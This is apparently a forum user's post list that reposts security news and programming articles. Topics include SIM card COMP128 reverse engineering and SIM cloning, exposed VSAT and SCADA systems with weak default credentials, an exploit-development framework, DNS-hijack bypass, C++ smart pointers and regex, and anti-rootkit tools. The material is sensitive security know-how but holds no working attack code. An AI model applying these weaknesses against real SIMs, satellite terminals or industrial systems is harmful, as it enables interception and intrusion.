Everything posted by Nytro

  1. Bowcaster Exploit Development Framework This framework, implemented in Python, is intended to aid those developing exploits by providing a useful set of tools and modules, such as payloads, encoders, connect-back servers, etc. Currently the framework is focused on the MIPS CPU architecture, but the design is intended to be modular enough to support arbitrary architectures. To install, run: python setup.py install Sursa: https://github.com/zcutlip/bowcaster
  2. [h=3]Secrets of the SIM[/h] The first project I would like to share concerns the SIM card's "secret" key derivation algorithm, COMP128. I was asked to put together a small presentation about the old GSM system's security at my former employer. Since I really hate presentations without any hands-on experience, I wanted to actually show the internal mechanisms of the SIM and the mobile phone, as well as the base station's communication, so I did a "quick" search (it took two days) into the current state of GSM-related software and tools available to an ordinary person that could be used to put together something interesting. The results are a bit shocking... but in a good way. I will describe the mobile phone and BTS emulation part later, since all of the information about them can already be found on the Internet.
To show the internal mechanisms of a SIM card, as well as the communication between the SIM and the mobile phone, I found the following tools handy:
1. SimTrace. This little piece of hardware is awesome! It sniffs the communication between the SIM and the telephone and integrates into Wireshark with a normal dissector for parsing the raw data, so you can see what goes over the wire on the fly.
2. A programmable SIM card. This programmable SIM can be used like a standard SIM, but you can actually change the master key (Ki) used for key derivation. It can also switch between the derivation algorithms (COMP128 v1/v2/v3), which is really handy.
And that's it for tools. For the next step in putting this part of the presentation together, I had to refresh my memory about how authentication and encryption are carried out in GSM. Wikipedia and Google are here to help, as always.
Security features in GSM in a nutshell:
1. Challenge-response authentication
2. Symmetric encryption (A5)
The common secret is a 16-byte number stored in the SIM card and also at the respective mobile operator; it is called "Ki". Since the SIM is a smartcard, it is considered secure, and we all hope that our mobile operator is storing it in a really secure way too (otherwise every call and all data could be decrypted if it falls into the wrong hands).
GSM authentication:
1. The base station sends a 16-byte random number, RAND (I'm really curious whether it's really random...).
2. The SIM card takes this RAND and uses Ki (the secret number) to feed the A3A8 (also known as COMP128) algorithm. The output is a 12-byte number; call it OUTPUT.
3. OUTPUT is split into two parts: the upper 4 bytes are the SRES and the lower 8 bytes are the Kc.
4. The SRES is sent back to the base station as the authentication response. (On the other end of the line, the mobile operator runs the same algorithm; because it knows our key Ki, it calculates the same SRES and Kc. If the operator's SRES matches the SRES we sent back, we are authenticated on the network.)
5. The Kc is sent from the SIM card to the mobile phone. It will be used as the encryption key for the A5 algorithm (not discussed here).
Key derivation: using SIMtrace and Wireshark, we can see that the mobile phone sends only one command to the SIM card, together with the RAND, and the card sends back the SRES+Kc bytes. This can be observed in plain text. The big question remained: how exactly does the COMP128 algorithm work? After some searching I found that there are three versions of COMP128, but only the first one is publicly available.
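To make the SRES/Kc split concrete, here is a minimal C++ sketch of the output handling described in steps 2-3 above (the a3a8() stub and the gsm_auth/AuthResult names are purely illustrative; COMP128 itself is deliberately not reproduced, and the author's own implementation is in Python):
#include <algorithm>
#include <array>
#include <cstdint>

// Stand-in for COMP128 (A3A8): maps a 16-byte Ki and a 16-byte RAND to a
// 12-byte output. The real algorithm is deliberately not reproduced here.
std::array<std::uint8_t, 12> a3a8(const std::array<std::uint8_t, 16>& ki,
                                  const std::array<std::uint8_t, 16>& challenge) {
    (void)ki;
    (void)challenge;
    return {}; // placeholder
}

struct AuthResult {
    std::array<std::uint8_t, 4> sres; // sent back to the network
    std::array<std::uint8_t, 8> kc;   // later handed to the phone as the A5 key
};

// Split the 12-byte A3A8 output exactly as described above:
// upper 4 bytes -> SRES, lower 8 bytes -> Kc.
AuthResult gsm_auth(const std::array<std::uint8_t, 16>& ki,
                    const std::array<std::uint8_t, 16>& challenge) {
    const auto out = a3a8(ki, challenge);
    AuthResult result{};
    std::copy(out.begin(), out.begin() + 4, result.sres.begin());
    std::copy(out.begin() + 4, out.end(), result.kc.begin());
    return result;
}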
-------------------- A little history: after version 1 of COMP128 was published, it turned out that by observing the input and output of the algorithm for several inputs, one can easily recover the secret key Ki. This means SIM card cloning! It also means that if someone "checked" your SIM card before you obtained it from the shop or from your company, they will know the secret key, so if they manage to sniff your calls over the air, they will be able to decrypt the communication without much effort. So far only version 1 is known to be weak against this birthday-paradox-based attack, and this is why it's no longer used (discontinued in 2002). Since versions 2 and 3 have not been officially published (again, I have not found any publication of them so far), extensive cryptanalysis has probably not been carried out on them (khmm... just saying...). --------------------
It seems that versions 2 and 3 have not been published yet, or I was looking on the wrong Google? I became a bit frustrated that the presentation would be incomplete, so I decided to dig further. Luckily I "found" a piece of test software used for SIM card compliance checks, which could also exercise versions 2 and 3 of the algorithm! Only one thing was left: reverse engineer the software to learn the actual algorithm, and then check it against a valid implementation to be sure (remember the programmable SIM card I mentioned?). Using IDA I was able to recover the two algorithms from the software and implemented them in pure Python. (Have I mentioned that I love Python?) It took some time, but I think it was a really good opportunity to learn a bit more about IDA.
The testing part took almost as long as the reverse engineering, because the command to change the algorithm of the programmable SIM was not working as described in the documentation (if we can call that poorly written nothing documentation); I'll post the working command, but right now I don't know where I have put it. For this, I wrote a small Python script to load a key into the programmable SIM, generate 1024 random 16-byte RAND numbers, send each as the argument of the AUTH command, and store the response. (Doing this for both v2 and v3 is a little like brute forcing, huh?) Another script was responsible for cross-checking the results from the SIM with the results from the Python script. No errors were found. This, however, doesn't mean that my implementation of COMP128v2 and v3 is perfect and completely follows the standard (as this part of the standard is not published, as far as I know), so please check it yourself and let me know the details.
Some words about COMP128. In v1 and v2 the last byte of the Kc was always 0x00, and the byte before the last was guessable (it could only take 4 different values, if I remember correctly). This means that the key used to encrypt your communication was weakened on purpose. In v3 this "limitation" was finally removed, but that doesn't help much to increase security, since the encryption algorithm used in GSM communication (A5) is officially broken. If you want security, switch to 3G; the algorithms used for encryption and authentication there are public, and so far there are no publicly known weaknesses in them (as far as I'm aware). I hope that by sharing this algorithm I help everyone who wants to know how the SIM card works to get a better understanding.
I was thinking about implementing this algorithm on a Java Card, thus creating programmable SIMs, or using it as a software-emulated SIM solution to test some weaknesses in the GSM network, but so far I have a lot of work to do. If someone does this, please drop me a mail. Implementation and some test vectors (not a well-defined test vector set, I know): comp128.7z Thank you for reading! P.S.: this is my first blog ever; suggestions on how to do it better are always welcome. Posted by Hacking Projects at 09:24 Sursa: Hacking Projects: Secrets of the SIM
  3. A very interesting subject; I will write a complete tutorial about friendship.
  4. Using Regular Expressions with Modern C++ Kenny Kerr “C++ is a language for developing and using elegant and efficient abstractions.” —Bjarne Stroustrup This quote from the creator of C++ really sums up what I love about the language. I get to develop elegant solutions to my problems by combining the language features and programming styles that I deem most suitable to the task. C++11 introduced a long list of features that are in themselves quite exciting, but if all you see is a list of isolated features, then you’re missing out. The combination of these features makes C++ into the powerhouse that many have grown to appreciate. I’m going to illustrate this point by showing you how to use regular expressions with modern C++. The C++11 standard introduced a powerful regular expression library, but if you use it in isolation—using a traditional C++ programming style—you might find it somewhat tiresome. Unfortunately, this is the way that most of the C++11 libraries tend to be introduced. However, there is some merit in such an approach. If you were looking for a concise example of using some new library, it would be rather overwhelming to be forced into comprehending a slew of new language features at the same time. Still, the combination of C++ language and library features really turns C++ into a productive programming language. Articol: Windows with C++ - Using Regular Expressions with Modern C++
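Not code from Kenny Kerr's article, just a minimal sketch of the standard C++11 <regex> facilities it builds on, combining them with auto, raw string literals and iterator-based traversal of the matches (the pattern and input text are illustrative):
#include <iostream>
#include <regex>
#include <string>

int main() {
    // Find "key=value" pairs using the C++11 <regex> library together with
    // auto, a raw string literal and iterator-based traversal of the matches.
    std::string const text = "host=example.com port=8080 mode=fast";
    std::regex const pair(R"((\w+)=(\w+))");

    for (auto it = std::sregex_iterator(text.begin(), text.end(), pair);
         it != std::sregex_iterator(); ++it) {
        std::cout << (*it)[1] << " -> " << (*it)[2] << '\n';
    }
}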
  5. Security researchers at IntelCrawler, a Los Angeles-based cyber intelligence company, discovered that VSAT terminals are open to targeted cyber attacks. VSAT (very-small-aperture terminal) systems used for satellite communications are vulnerable to external cyber attacks; the discovery was made by security researchers at IntelCrawler, a Los Angeles-based cyber intelligence company. The VSAT vulnerability appears serious and has a significant impact on distributed critical infrastructures and network environments.
VSATs are most commonly used to transmit: narrowband data (a channel in which the bandwidth of the message does not significantly exceed the channel's coherence bandwidth); typical applications are the transmission of payment transactions from points of sale, or transmission of data from/to SCADA systems; and broadband data (a channel with wide bandwidth characteristics of a transmission medium and the ability to transport multiple signals and traffic types simultaneously); typical applications are the provision of satellite Internet access to remote locations, VoIP or video data transmissions. VSATs are also used for transportable, on-the-move (utilizing phased array antennas) or mobile maritime communications. VSAT statistics included in the Comsys VSAT report confirm that there are 2,931,534 active VSAT terminals in the world now, primarily in the industrial sector, such as energy and oil and gas, because the infrastructure is based on distributed environments located in different geographic locations.
IntelCrawler has scanned the overall IPv4 address space to conduct intelligence analysis on the data retrieved. "We have scanned the whole IPv4 address space since 2010 and update the results in our Big Data intelligence database, including details about satellite operators network ranges, such as INMARSAT, Asia Broadcast Satellite, VSAT internet iDirect, Satellite HUB Pool, and can see some vulnerabilities," states Dan Clements, IntelCrawler President. Within the huge amount of data collected by IntelCrawler there are also approximately 313 open UHP VSAT terminals, 9,045 open HUGHES terminals, 1,142 SatLink VSATs and many others. It is important for network engineers and system administrators to self-assess and close or plug any possible exploits.
VSAT devices are connected to many interesting devices all over the world, from Alaska climate metering systems to industrial control devices in Australia, and many work over the C, Ka, Ku and X-band satellite ranges. IntelCrawler researchers have noted that many VSAT devices have telnet access with very poor password strength, many times using default factory settings. The fact that one can scan these devices globally and find holes is similar to credit card thieves in the early 2000s simply googling the terms "order.txt" and finding merchant orders with live credit cards. The onus is on the enterprises, governments, and corporations to police themselves. An attack against those devices could have serious repercussions, as explained by Dan Clements. "Intrusions to such open devices can allow you to monitor all the network traffic related to the exact device or host, sometimes with very sensitive information, which can lead to a compromise of the internal network," said Dan Clements, IntelCrawler's President. Some of the VSATs are readily visible in Google Maps and Google Earth. Again, system administrators should assess the physical security of these locations and make sure all is secure.
Satellite network ranges have lots of interesting objects, including government and classified communications. For example, during some research IntelCrawler found Ministry of Civil Affairs of China infrastructure in the ranges belonging to Shanghai VSAT Network Systems Co. LTD, and Ministry of Foreign Affairs of Turkey in Turksat VSAT Services, which is a clear and present danger for hacks. About IntelCrawler: IntelCrawler.com is a multi-tier intelligence aggregator, which gathers information and cyber prints from a starting big data pool of over 3,000,000,000 IPv4 addresses and over 200,000,000 domain names, which are scanned for analytics and dissemination to drill down to a desired result. This finite pool of cyber prints is then narrowed further by comparing it to various databases and forum intelligence gathered from the underground and networked security company contacts. The final result could be the location of a particular keyboard or a computer housing the threat. Pierluigi Paganini (Security Affairs – VSAT, hacking) Sursa: VSAT terminals are opened for targeted cyber attacks
  6. An overview on smart pointers 2014-01-10 11:20 by Jens Weller
My last blog post in 2013 was about the pointer in C++, and how most of its daily uses in C++ are now being replaced by classes that replace or manage the pointer. The last case, the RAII-like objects called smart pointers, is the topic of this post. I want to give an overview of the choices one can make when using smart pointers. As I studied boost, Qt and wxWidgets more closely last year, I saw that all of them have their own implementations of smart pointers. C++11 also brings its own set of two smart pointer classes. So, with C++11, smart pointers have arrived in the standard, and everyone using C++11 automatically has two good options for managing memory allocated with new.
Should you use smart pointers? I think it's good to discuss this point first: when you should use smart pointers, and when not. Smart pointers are only useful when used with new, or the corresponding make functions (make_shared, and make_unique in C++14, for example). So a smart pointer is only needed when you use new or other means of dynamic memory allocation. In my opinion, you should prefer to allocate variables on the stack, so when refactoring code (to C++11) you should always ask yourself whether a given new is needed, or could be replaced with an object on the stack. When you do need to use new, you should always use a smart pointer, in my opinion. Some smart pointers also offer a custom deleter, which is handy if you have an object that is either not allocated by new and/or needs to be freed by calling a special function.
A (not so) short overview on smart pointers: as mentioned, with C++11 two new classes came to the C++ standard, shared_ptr and unique_ptr, for managing memory allocated with new. Previously there was std::auto_ptr in the standard, which is now deprecated. The idea of using smart pointers is at least 20 years old, as the documentation of boost's Smart Ptr library shows. Boost has also been the go-to place for smart pointers before C++11; for example, wxWidgets copied its smart pointer version from boost in 2009.
Let's compare some of the implementations:
Name | copyable | moveable | custom deleter | can release ownership | comment
std::unique_ptr | no | yes | yes (by policy) | yes |
std::shared_ptr | yes | yes | yes | no |
boost::scoped_ptr | no | no | no | no |
boost::shared_ptr | yes | yes | yes | no |
QScopedPointer | no | no | yes | yes |
QSharedPointer | yes | no | yes | no |
wxScopedPtr | no | no | no | yes |
wxSharedPtr | yes | no (C++03) | yes | no |
poco::AutoPtr | yes | no (C++03) | no | no | A certain interface must be provided by T.
poco::SharedPtr | yes | no (C++03) | yes (by policy) | no |
dlib::scoped_ptr | no | no | yes | no |
dlib::shared_ptr | yes | no (C++03) | no | no | not threadsafe
dlib::shared_ptr_thread_safe | yes | no (C++03) | no | no | threadsafe
ACE::Value_Ptr | yes (but copies the pointee) | no (C++03) | no | no |
Glib::RefPtr | yes | no | no | no |
Loki::SmartPtr | yes per default | maybe over policies, else no | no | no | mostly policy based, very flexible
Loki::StrongPtr | yes per default | see above | yes | no | see above and Loki's Smart Pointer page
A few words on this table: almost all of these libraries implemented smart pointers well before C++11, so move constructors are not implemented and move behavior in general is not documented. Shared classes share the pointer between different instances through reference counting. I have experience with using the standard version, boost, Qt and wxWidgets; the other data is taken from the documentation of those libraries. I think that is enough for a first overview. Many other libraries have probably written their own versions, and some might even have oriented their solution on boost's Smart Ptr library as wxWidgets did; the C++11 smart pointers also have their roots in the boost versions. I didn't list platform- or library-specific smart pointers (except poco::AutoPtr). Also, some older libraries model std::auto_ptr. A special case is the smart pointer implementation from Loki, as it's very versatile and can be configured via policy-based design. By default it's shared, but you can create/use a non-shared policy.
So, smart pointers can be classified into (mainly) 4 categories:
1. scoped/unique
2. shared (usually refcounted)
3. intrusive / interface-based
4. framework specific
Scoped and unique smart pointers
This is the most common class, and in my opinion also the sort of smart pointer you should mostly use; only if your specific use case REALLY breaks the case for this type should you think about using any of the other types.
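A minimal sketch of this scoped/unique style, assuming a C++14 compiler for std::make_unique (the Widget type and make_widget() factory are illustrative, not taken from the article):
#include <iostream>
#include <memory>

struct Widget {
    ~Widget() { std::cout << "Widget destroyed\n"; }
    void draw() const { std::cout << "drawing\n"; }
};

// unique_ptr is movable, so a factory can hand ownership out of its own scope.
std::unique_ptr<Widget> make_widget() {
    return std::make_unique<Widget>(); // C++14; in C++11 use std::unique_ptr<Widget>(new Widget)
}

int main() {
    auto w = make_widget(); // sole owner of the Widget
    w->draw();
}   // no delete needed: the Widget is destroyed when w leaves scope,
    // even if an exception had been thrown in between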
The scoped pointer ensures that an allocated object is destroyed when its scope ends. Interestingly, Poco seems to lack this type of smart pointer. A special case is std::unique_ptr, as it does not have quite the same behavior as the scoped pointers: it is allowed to escape its scope through a move. This makes it possible to have a container of unique_ptr, or, for example, a factory returning them; C++14 will also add make_unique. With the addition of make_unique in C++14, the use of new (and also delete) is handled in the background, so the need for directly using new and delete is (mostly) gone. Non-owning pointers to scoped or unique pointers still need to be raw pointers. There is a proposal called exempt_ptr which could take this role.
Shared smart pointers
Sometimes you need the ability to share a pointer between classes and objects, and so smart pointers have a shared type, which ensures through refcounting that the held pointer stays valid until the last instance is destroyed. Each time a copy of the first shared pointer is destroyed, the refcount goes down; if it ever reaches 0, the object is destroyed. Ever? Yes. That is one of the problems with this implementation: a cyclic dependency can occur that prevents one or more smart pointers from ever being destroyed, for example if you model a parent-child relation with two shared pointers. This is why (most) shared pointer implementations today also provide a weak_ptr, which can be converted into a shared pointer when needed. The weak_ptr only holds a weak link to the original object. This is usually implemented with two counters, one for strong references (i.e. actual copies) and one for weak pointer objects. The allocation of the actual object can be a bit special with shared pointers, as the variable for refcounting should also be allocated on the heap. This is a very good use case for placement new, as it allows a single call to new to allocate the space for both the counters and the actual object. This is only possible if it's done in a make_shared-like function, not inside a constructor of a shared pointer type. Interestingly, I'm only aware of std::make_shared and boost::make_shared; the other shared pointer implementations don't mention special make functions. But shared pointers are only good in a few places. You should be aware that this is more or less a globally shared variable; most implementations are not threadsafe for accessing the held pointer, and some might not even have threadsafe reference counting. Only using a shared_ptr<const T> should be viewed as safe, as it only shares a const object which cannot be altered. Also, const methods are thread safe in C++.
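A minimal sketch of the parent-child cycle just described, and how weak_ptr breaks it (the Parent/Child types are illustrative, not from the article):
#include <memory>

// Parent and child pointing at each other with shared_ptr in both directions
// would form a cycle and never be freed; the child therefore holds a weak_ptr.
struct Child;

struct Parent {
    std::shared_ptr<Child> child;
};

struct Child {
    std::weak_ptr<Parent> parent; // weak: does not keep the Parent alive
};

int main() {
    auto p = std::make_shared<Parent>();
    p->child = std::make_shared<Child>();
    p->child->parent = p;

    if (auto locked = p->child->parent.lock()) {
        // promote the weak link to a real shared_ptr only while it is used
    }
}   // both objects are destroyed here; with two shared_ptrs they would leak
Without the weak link, the two strong reference counts would keep each other above zero and neither destructor would ever run.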
Intrusive / Interface based smart pointers
I didn't list boost::intrusive_ptr, and some other frameworks have similar solutions; poco::AutoPtr also belongs in this class. This kind of smart pointer usually holds a pointer which has some internal mechanism for refcounting. It can be used for interfacing with COM or other APIs and C libraries. Some frameworks also offer interfaces which you need to implement for a certain type in order to use the smart pointer interface; this is usually a function/method for incrementing and decrementing, and maybe release.
Framework specific (smart) pointer classes
There exist a few smart pointer classes which are framework specific. For example, QPointer is designed to hold a QObject-derived instance; it does not call delete when it is destroyed, but when the QObject is destroyed it will no longer point to it. Qt also offers QSharedDataPointer, a shared pointer which allows implicit sharing; in order to use it you have to derive from QSharedData. CComPtr from the ATL can also be seen either as an intrusive variant or a framework-specific smart pointer.
Refactoring towards smart pointer usage
So, now that an overview has been given, and a little has been written about correct usage, I'd like to focus on refactoring. There is a lot of code which currently does not use smart pointers. Even newly written SDKs sometimes do not use them, but mostly use delete correctly. One of the advantages of smart pointers is that, thanks to RAII, they ensure the actual object is deleted. When using a raw pointer, you need to have a delete for every possible exit point, and an exception will still lead to a memory leak. Smart pointers will also free the memory if an exception occurs. I'd like to share a little story about this. A few years ago an SDK was released for a certain mobile platform, and, being OO code, there was a need to use new on all kinds of objects. I was interested in writing apps for this platform, so I visited a public event for app developers for this SDK. I even got a phone! After the event there was some socializing, and I got to talk to a person belonging to the dev team for the C++ API. I asked him why they didn't use smart pointers, instead of letting the users produce all kinds of memory leaks on their platform. The answer was "What are smart pointers?" So, it turns out, they used C++ and had never heard about smart pointers. So, let's say that for our industry smart pointers are not standard, and there is some amount of code that needs refactoring. You have to be very careful when refactoring a simple pointer into a smart pointer. Member pointers within a class can usually be converted, but you have to find out whether you can make the pointer a unique/scoped pointer, or whether it is shared among different objects, requiring you to make it a shared pointer. Use features of your IDE like "show all usages" to see if and how you can convert a simple pointer to a smart pointer. Some pointers are just non-owning pointers; this is fine if the pointer itself is either pointing to a non-newed object or to one held in a unique or scoped pointer. Shared pointers usually have a weak pointer type for this usage. With scoped pointers in (member) functions you have to be a bit more careful. Last year I saw a very hard-to-find problem with this: turning a new allocation in a larger function into a scoped ptr did not result in a crash when the program was still accessing the value. Instead it seemed to work just fine for some time, and things did not even crash; the application was just showing weird values. Interestingly, this triggered far earlier in debug mode. Also, a scoped pointer cannot be returned from a factory function, but unique_ptr can use move semantics.
Custom deleters & smart arrays
The table above shows that some smart pointer classes offer custom deleters and some do not. Boost does not support this feature for scoped_ptr, maybe because you could easily implement it yourself: simply a class wrapping a pointer to T and doing the correct thing in the destructor. This class can then be used directly on the stack or be wrapped into a shared smart pointer. A special case is arrays allocated with new[]. Boost has its own classes for this (scoped_array and shared_array), and boost::shared_ptr also has traits to detect array usage and correctly free it with delete[] instead of delete.
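A minimal sketch of a custom deleter and of the array case, using std::unique_ptr (the FILE*/fclose example is illustrative, not from the article):
#include <cstdio>
#include <memory>

int main() {
    // Custom deleter: the resource is not allocated with new, so the smart
    // pointer must call fclose() instead of delete when it goes out of scope.
    std::unique_ptr<std::FILE, int (*)(std::FILE*)> file(std::fopen("log.txt", "w"),
                                                         &std::fclose);
    if (file) {
        std::fputs("hello\n", file.get());
    }

    // Array form: unique_ptr<T[]> calls delete[] instead of delete.
    std::unique_ptr<int[]> buffer(new int[64]);
    buffer[0] = 42;
}   // fclose() and delete[] both run automatically here
The deleter is only invoked for a non-null pointer, so a failed fopen() needs no extra handling.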
Smart pointers that have a custom deleter can be used with smart arrays and an array deleter.
So which smart pointer should you prefer?
As I already wrote, use the stack if possible, and if you need a smart pointer it's simply: std::unique_ptr or a scoped ptr > shared pointer > intrusive pointer > framework specific pointer classes. This leaves the question of which implementation you should favor, and I think that is something which has to be decided based on the local needs of the code you work on. For libraries I think the standard implementations are good, but if you need backwards compatibility to pre-C++11, boost is just as good. And if you already use a framework such as Qt or wxWidgets, you can also use their implementations. For shared smart pointers you should always prefer to call the make_shared function (if the implementation offers one); with C++14 the standard also offers a make_unique function for unique_ptr.
Disadvantages of smart pointers
There are two things which can be seen as disadvantages; actually it's only one little overhead and one issue with the standardization of smart pointers. First, with C++11, smart pointers (and some other nice things) are now part of the standard; before C++11 this was a very good argument for using boost. I think that boost has many other advantages, but smart pointers are a good door opener, especially in more restricted areas where you have to get libraries or frameworks approved before using them. Second, there is a little overhead. Shared pointers usually add two counting variables to the memory needs of your class, while unique_ptr is just a wrapper. This is a tiny overhead in memory usage, which is largely outweighed by the safety smart pointers offer. Only a few embedded devices should be unable to afford this little overhead. The small overhead in allocation should also be fine for most applications; if your application is speed critical, you might want to measure whether smart pointers have any impact on your system.
© 2014 Code Node Ltd. All rights reserved. Sursa: An overview on smart pointers - Meeting C++
  7. [h=1]UK's Ministry of Defence funds "hacker culture" research[/h] The UK's Ministry of Defence (MoD) is doling out millions of dollars for research pertaining to hacker culture and the impact social media has in moments of crisis. Over the past five years, the MoD's Defence Science and Technology Laboratory has funded multiple PhD projects, and this year awarded more than $100,000 toward research on the rise of digital insurgency, according to The Telegraph. The study will analyze hacker collective Anonymous in order to understand the group's goals and what entices potential members to join. Additionally, the MoD gave students a grant to look at the influence online and offline behavior has on users' social network identities. The PhD candidates hope to determine the role these platforms have on events such as the Arab Spring. Since the funding first began, more than $1.4 million has been awarded. Sursa: UK's Ministry of Defence funds "hacker culture" research - SC Magazine
  8. Bypassing a DNS man-in-the-middle attack against Google Drive Boston to New York City is a frequently traveled route, so a number of different bus lines provide service between the cities. Most offer free WiFi as an amenity. However, all WiFi is not created equal. Today I was traveling by the Go Bus, and I assumed I'd be able to do some work on the bus. I needed to access a document on Google Drive. However, when I tried to open Drive, I was greeted with this sight. I use OpenDNS instead of relying on my ISP's DNS servers, and I figured that there was some error on OpenDNS's end. So, I changed my /etc/resolv.conf to use the Google DNS servers, figuring that would work. No luck. At this point, I realized that the bus network must be hijacking traffic on port 53, which was easy to test. dig gave me the following output: Visiting 67.215.65.130 directly gives the following page. Saucon TDS uses OpenDNS for DNS lookups, but they redirect undesired lookups to their block page. I confirmed this by asking my neighbor across the aisle to visit drive.google.com - he happened to be using Safari, which gave him a 404-esque page instead of the big red error message that Chrome gave, but that was enough for me to confirm that the bus was, indeed, hijacking traffic on port 53.
But how to fix it? The correct IP address for drive.google.com is actually 74.125.228.1 (ironically, I looked this up using OpenDNS: CacheCheck | OpenDNS). However, entering that IP address into your browser will give you the Google homepage, because unlike most sites, their servers check the hostname (the same is true for all Google subdomains). The fix is actually rather simple - add an /etc/hosts entry mapping drive.google.com to 74.125.228.1. This will skip the DNS lookup altogether, but the browser will still think that you're going to drive.google.com "normally" (in a way, you are). I write this post to illustrate how easy it is to get around this kind of traffic shaping, for anybody else who has the misfortune of running into this problem.
On principle, supporters of net neutrality oppose traffic blocks based on content (instead of volume). However, Go Bus and Saucon TDS are not simply blocking traffic - they are hijacking it. My DNS queries are made to a third party, and yet they decide to redirect them to their own DNS servers anyway. From a user perspective, this is incredibly rude. From a security perspective, it's downright malicious. I let them know over Twitter, though I haven't received a response yet. Other than using a VPN (which would have required advance preparation on my part), is there a long-term solution to authenticating DNS queries? Some people advocate DNSSEC. On the other hand, Thomas Ptacek (tptacek), whom I tend to trust on other security matters, strongly opposes it and recommends DNSCurve instead. In the meantime, let's hope that providers treat customers with respect, and stop this malicious behavior. Sursa: /var/null - Bypassing a DNS man-in-the-middle attack against Google Drive
  9. 5 Video Tutorial Playlists On Assembly Programming! Tuesday, December 03, 2013: Looking for video tutorials on Assembly Programming? Seek no more, as we bring you 5 awesome playlists with over 100 videos on different aspects of assembly programming. So pull up your socks and set yourself to go pro in assembly.
1. SolidusCode - Assembly Language Programming Tutorial
https://www.youtube.com/watch?feature=player_embedded&v=ofVFSQguVNI&list=PLF5351B80A7005FA1
Slowly graduating from beginner to pro level, this is a series by Solidus Code.
2. Assembly Language Programming Video Course - Hitesh Kumar
https://www.youtube.com/watch?feature=player_embedded&v=1p6LfUkWPKI&list=PL4C2714CB525C3CD7
A well explained and elaborated series on assembly programming by Hitesh Kumar.
3. Assembly Language Tutorial - Debojyoti Majumder
https://www.youtube.com/watch?feature=player_embedded&v=4VNgd3WM95E&list=PL24A96ADA54E75109
One of the best tutorial collections available online, which has been quoted by quite a few websites. The tutorials end up giving you a fair idea of assembly language; they start with the theory and graduate to the actual coding.
4. Assembly Language Programming - Rasim Muratovic
https://www.youtube.com/watch?feature=player_embedded&v=vtWKlgEi9js&list=PLPedo-T7QiNsIji329HyTzbKBuCAHwNFC
This series by Rasim Muratovic is a collection of 38 video tutorials on Assembly programming.
5. Assembly Language Primer for Hackers – eduprey1
https://www.youtube.com/watch?v=K0g-twyhmQ4&feature=player_embedded&list=PLue5IPmkmZ-P1pDbF3vSQtuNquX0SZHpB
The series consists of 11 videos and lasts a total of 3 hours 22 minutes.
Atithya Amaresh, EFYTIMES News Network Sursa: 5 Video Tutorial Playlists On Assembly Programming!
  10. Hackers gain 'full control' of critical SCADA systems By Darren Pauli on Jan 10, 2014 10:06 AM (3 days ago) Over 60,000 exposed control systems found online.
Researchers have found vulnerabilities in industrial control systems that they say grant full control of systems running energy, chemical and transportation systems. The vulnerabilities were discovered by Russian researchers who over the last year probed popular and high-end ICS and supervisory control and data acquisition (SCADA) systems used to control everything from home solar panel installations to critical national infrastructure. Positive Research chief technology officer Sergey Gordeychik and consultant Gleb Gritsai detailed vulnerabilities in Siemens WinCC software, which was used in industrial control systems including Iran's Natanz nuclear plant, the target of the US Stuxnet program. "We don’t have big experience in nuclear industry, but for energy, oil and gas, chemical and transportation sectors during our assessments project we demonstrated to owners how to get full control [of] industrial infrastructure with all the attendant risks," Gordeychik told SC Magazine. The vulnerabilities existed in the way passwords were encrypted and stored in the software's Project database, and allowed attackers to gain full access to Programmable Logic Controllers (PLCs) using attacks described as dangerous and easy to launch. A vulnerability was also found in the cloud SCADA platform Daq Connect, which allowed attackers running a demonstration kiosk to access other customer installations. The vendor told the researchers who reported the flaw to simply 'not do' the attacks. The researchers published an updated version of a password-cracking tool that targeted the vulnerability in Siemens PLC S-300 devices as part of the SCADA Strangelove project at the Chaos Communications Conference in Berlin. They also published a cheat sheet to help researchers identify nearly 600 ICS, PLC and SCADA systems. SCADA Strangelove had identified more than 150 zero-day vulnerabilities of varying degrees of severity affecting ICSes, PLCs and SCADA systems. Of those, 31 percent were less severe cross-site scripting vulnerabilities and five percent were dangerous remote code execution holes. The latter vulnerabilities were notably dangerous because most of the affected systems lacked defences such as Address Space Layout Randomisation and Data Execution Prevention designed to make exploitation more difficult. But it wasn't just industrial systems that were affected; the researchers found some 60,000 ICS devices -- many of which were home systems -- exposed to the public internet and at risk of attack. The most prevalent vendors were Tridium, NRG Systems and Lantronix, while the most common devices to be crawled using search engines were the Windcube solar smartgrid system, the IPC CHIP embedded device, and the Lantronix SLS video capture platform. The researchers reported exposed devices to various computer emergency response teams and watchdog groups including the European infosec agency ENISA.
Patched
The findings follow the discovery of separate serious vulnerabilities in Siemens industrial ethernet switches that allowed attackers to run administrative tasks and hijack web sessions. Siemens released patches overnight to address the flaws in its SCALANCE X-200 switches that were quietly reported by researchers at security firm IOActive. The flaws related to a lack of entropy in random number generators used in the switches.
Researcher Eireann Leverett praised Siemens for its rapid response to fix the flaws. Copyright © iTnews.com.au . All rights reserved. Sursa: http://www.itnews.com.au/News/369200,hackers-gain-full-control-of-critical-scada-systems.aspx
  11. “Advanced” Anti-Rootkit Tool List - Mostly Modern By request comment from Anonymous…out of my Anti-Malware Response “Go-Kit” post. When getting this post organized and reviewing the tools I still have tucked away in my USB collection, it turns out that many, many of them are outdated, haven’t been updated in many years, and quite probably will not work on either more “modern” Windows OS versions like Vista/Win7/Win8 nor detect newer variants of root-kit/boot-kit attacks. Many of the original source pages they came from are now HTTP 404. That doesn’t bode well for their continued usage even if you can find an old binary pack tucked away on a download archive. So, just because tool is listed here is absolutely no guarantee that it will work on your system or even detect a threat if it is there. Some of these tools are “detect and remove” types and others are more like advanced utilities that can be used to hunt for indication of hidden or masked processes and system hooks that could be indications of infection…but then leave it up to you to decide if they are a threat and to remove them yourself. While scan-and-remove tools are “easy” the second type are more helpful as you can better identify and collect data on what is going on for reference and sharing with the threat detection community. AND…as we have learned (DEITYBOUNCE: NSA Exploit of the Day - SANS ISC) advanced threat persistence can be neigh impossible to shake off short of scrapping all your hardware and starting fresh…if you can even trust your new hardware. That said, I did find a few “new-to-me” tools and have listed them here. SO…I go back to my best-available solution…secure-wipe the drive(s)…zero those sectors out…then do a fresh reinstall using known-good install files, and bring the system up to a fully-patched and updated state before saying “Done!” And be sure to multi-scan any and all user-data and files you have backed up/recovered off the drive(s) before you put them back. Cross-contamination is a real pain…both on PC’s and kitchen surfaces. Older GrandStreamDreams blog posts for way-back reference. Note, if you are really curious you can find many more “expired” AntiRootkit tools in these posts if you are really interested. I’ve left most all of them out of this post for reasons as stated above. grand stream dreams: Anti-Rootkit Tools Roundup Revisited - January 2008 post listing AR tools. grand stream dreams: Rootkit Storm and Solutions - January 2007 post. grand stream dreams: Windows Rootkit Detectors - July 2006 post. “Advanced” Antirootkit tools - listed in semi-alphabetical order 